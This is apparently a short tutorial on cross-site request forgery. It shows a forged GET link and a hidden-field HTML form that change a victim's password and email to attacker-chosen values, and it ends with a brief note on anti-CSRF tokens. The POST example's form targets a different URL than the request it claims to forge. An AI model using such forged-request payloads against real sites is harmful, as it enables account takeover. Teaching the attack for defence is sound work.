Share on :
CSRF is an attack that forces a victim user to perform unwanted actions like transferring funds, changing password or email.
its all about performing an action that we can't do but our victim has the privilege to do it (eg. changing his own password).
We have several approaches for this attack, but we have to know how can we generate a valid malicious request to let to trick out victim into launching it.
so Firstly we will attempt to change our password to Very $ecret in our account and look at the request
GET /change_password/?new_password=Very%20$ecret HTTP/1.1
Host: website.comNow we will embed the following url with in our malicious website with the desired password
<a href="http://example.com/change_password/?new_password=Hacked!!!">Click Me!</a>Once the victim clicks it , a request will be launched changing his password to the one we chose previously !
let's see another example with POST method
Let's assume that we want to forge the following request:
POST /profile/edit HTTP/1.1
Host: website.com
email=Hackers_Email@hacker.com&password=Hackers_Passwordso we will have to embed the following html in our malicious page
<form action="<nowiki>http://bank.com/transfer.do</nowiki>" method="POST">
<input type="hidden" name="email" value="Hackers_Email@hacker.com"/>
<input type="hidden" name="password" value="Hackers_Password"/>
<input type="submit" value="Click ME !"/>
</form>Once the user click it, email and password will be changed to the ones in the request.
its a random token supplied by the server for each client and it should be sent from the client to the server and validated by the server for each request, and it's usually a post or get parameter and can be also a http header.